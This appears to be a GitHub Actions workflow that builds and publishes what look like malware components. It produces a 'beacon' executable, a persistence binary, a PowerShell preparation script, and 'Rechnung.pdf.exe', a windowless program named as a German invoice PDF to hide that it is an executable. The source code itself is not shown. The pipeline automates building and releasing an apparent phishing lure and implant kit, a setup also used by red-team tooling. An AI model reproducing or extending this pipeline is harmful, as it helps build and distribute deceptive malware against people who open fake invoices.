name: build-executable

on:
  push:
    tags:
    - '*'

jobs:
  build:
    
    runs-on: windows-latest

    steps:
    - uses: actions/checkout@v4
    - name: set up Python
      uses: actions/setup-python@v5
      with:
        python-version: '3.11'
    - name: install requirements
      run: pip install -r requirements.txt
    - name: write scripts into constants
      run: python .\utils\write_scripts_into_constants.py
    - name: run pyinstaller
      run: pyinstaller -F beacon.py
    - name: run gcc for Rechnung.pdf.exe
      run: gcc -mwindows -o Rechnung.pdf.exe Rechnung.pdf.c script_constants/script_constants.c helpers.c
    - name: run gcc for persistance.exe
      run: gcc -mwindows -o persistance.exe persistance.c helpers.c
    - uses: ncipollo/release-action@v1
      with:
        artifacts: "dist/beacon.exe,Rechnung.pdf.exe,persistance.exe,utils/prepare-important-files.ps1"